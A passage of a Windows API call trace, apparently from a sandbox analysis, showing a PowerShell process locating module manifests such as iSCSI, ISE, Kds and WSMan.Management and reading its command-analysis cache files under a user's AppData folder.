lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9f4 [0282.448] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9f4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.448] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0282.448] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.448] CoTaskMemFree (pv=0x25b73cfee20) [0282.448] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", lpFilePart=0x0) returned 0x43 [0282.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.448] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7b7b80 | out: lpFileInformation=0x25b5c7b7b80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3)) returned 1 [0282.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.449] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.449] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_782e0b50-c4a7-460d-a5be-c3112cdfa685", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_782e0b50-c4a7-460d-a5be-c3112cdfa685", lpFilePart=0x0) returned 0x93 [0282.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.449] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_782e0b50-c4a7-460d-a5be-c3112cdfa685" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_782e0b50-c4a7-460d-a5be-c3112cdfa685"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9f8 [0282.449] GetFileType (hFile=0x9f8) returned 0x1 [0282.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.450] GetFileType (hFile=0x9f8) returned 0x1 [0282.450] ReadFile (in: hFile=0x9f8, lpBuffer=0x25b5c7b8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7b8df0*, lpNumberOfBytesRead=0x653ef8d338*=0x74f, lpOverlapped=0x0) returned 1 [0282.452] ReadFile (in: hFile=0x9f8, lpBuffer=0x25b5c7b8df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7b8df0*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.452] CloseHandle (hObject=0x9f8) returned 1 [0282.452] ReleaseMutex (hMutex=0x9f4) returned 1 [0282.452] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0282.452] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff8c0 [0282.452] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff8c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.452] CoTaskMemFree (pv=0x25b73cff8c0) [0282.452] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01680 [0282.452] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01680 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.452] CoTaskMemFree (pv=0x25b73d01680) [0282.452] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.452] GetCurrentProcess () returned 0xffffffffffffffff [0282.452] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9f8) returned 1 [0282.453] GetTokenInformation (in: TokenHandle=0x9f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.453] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984c30 [0282.453] GetTokenInformation (in: TokenHandle=0x9f8, TokenInformationClass=0x1, TokenInformation=0x25b73984c30, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984c30, ReturnLength=0x653ef8d6b8) returned 1 [0282.453] LocalFree (hMem=0x25b73984c30) returned 0x0 [0282.454] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7bdc18, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7bdc18*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.454] CreateMutexW (lpMutexAttributes=0x25b5c7bdd68, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9fc [0282.454] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9fc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.455] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa3c0 [0282.455] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa3c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.455] CoTaskMemFree (pv=0x25b73cfa3c0) [0282.455] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0282.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.455] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7be3a0 | out: lpFileInformation=0x25b5c7be3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da)) returned 1 [0282.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.455] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.455] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.455] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_78848cf8-29c5-4b3e-8e64-73e18028edff", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_78848cf8-29c5-4b3e-8e64-73e18028edff", lpFilePart=0x0) returned 0x93 [0282.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.456] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_78848cf8-29c5-4b3e-8e64-73e18028edff" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_78848cf8-29c5-4b3e-8e64-73e18028edff"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa00 [0282.456] GetFileType (hFile=0xa00) returned 0x1 [0282.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.456] GetFileType (hFile=0xa00) returned 0x1 [0282.457] ReadFile (in: hFile=0xa00, lpBuffer=0x25b5c7bf608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7bf608*, lpNumberOfBytesRead=0x653ef8d338*=0x31a, lpOverlapped=0x0) returned 1 [0282.458] ReadFile (in: hFile=0xa00, lpBuffer=0x25b5c7bf608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7bf608*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.458] CloseHandle (hObject=0xa00) returned 1 [0282.459] ReleaseMutex (hMutex=0x9fc) returned 1 [0282.459] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1", lpFilePart=0x0) returned 0x3f [0282.459] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb4c0 [0282.459] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb4c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.460] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.460] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.460] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.460] CoTaskMemFree (pv=0x25b73d007a0) [0282.460] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.460] GetCurrentProcess () returned 0xffffffffffffffff [0282.460] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa00) returned 1 [0282.460] GetTokenInformation (in: TokenHandle=0xa00, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.460] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984d30 [0282.460] GetTokenInformation (in: TokenHandle=0xa00, TokenInformationClass=0x1, TokenInformation=0x25b73984d30, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984d30, ReturnLength=0x653ef8d6b8) returned 1 [0282.461] LocalFree (hMem=0x25b73984d30) returned 0x0 [0282.461] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7c3588, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7c3588*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.461] CreateMutexW (lpMutexAttributes=0x25b5c7c36d8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa04 [0282.461] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa04, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.462] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0282.462] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.462] CoTaskMemFree (pv=0x25b73cfa800) [0282.462] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1", lpFilePart=0x0) returned 0x3f [0282.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.462] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7c3d10 | out: lpFileInformation=0x25b5c7c3d10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209)) returned 1 [0282.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.462] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.462] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.462] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_3fef482b-31c3-4a81-ab0c-81769291b942", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_3fef482b-31c3-4a81-ab0c-81769291b942", lpFilePart=0x0) returned 0x93 [0282.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.462] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_3fef482b-31c3-4a81-ab0c-81769291b942" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_3fef482b-31c3-4a81-ab0c-81769291b942"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa08 [0282.463] GetFileType (hFile=0xa08) returned 0x1 [0282.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.463] GetFileType (hFile=0xa08) returned 0x1 [0282.463] ReadFile (in: hFile=0xa08, lpBuffer=0x25b5c7c4f78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7c4f78*, lpNumberOfBytesRead=0x653ef8d338*=0x444, lpOverlapped=0x0) returned 1 [0282.465] ReadFile (in: hFile=0xa08, lpBuffer=0x25b5c7c4f78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7c4f78*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.465] CloseHandle (hObject=0xa08) returned 1 [0282.465] ReleaseMutex (hMutex=0xa04) returned 1 [0282.465] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0282.465] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc3a0 [0282.465] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc3a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.465] CoTaskMemFree (pv=0x25b73cfc3a0) [0282.465] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb4c0 [0282.465] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb4c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.465] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.465] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.466] GetCurrentProcess () returned 0xffffffffffffffff [0282.466] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa08) returned 1 [0282.466] GetTokenInformation (in: TokenHandle=0xa08, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.466] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984bf0 [0282.466] GetTokenInformation (in: TokenHandle=0xa08, TokenInformationClass=0x1, TokenInformation=0x25b73984bf0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984bf0, ReturnLength=0x653ef8d6b8) returned 1 [0282.467] LocalFree (hMem=0x25b73984bf0) returned 0x0 [0282.467] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7c94b8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7c94b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.467] CreateMutexW (lpMutexAttributes=0x25b5c7c9608, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa0c [0282.467] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa0c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.467] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d00e00 [0282.467] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d00e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.467] CoTaskMemFree (pv=0x25b73d00e00) [0282.467] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0282.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.467] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7c9c98 | out: lpFileInformation=0x25b5c7c9c98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba)) returned 1 [0282.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.468] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.468] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.468] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6bea9096-37d0-4e77-b7de-7ff84865f3cc", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6bea9096-37d0-4e77-b7de-7ff84865f3cc", lpFilePart=0x0) returned 0x93 [0282.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.468] CreateFileW 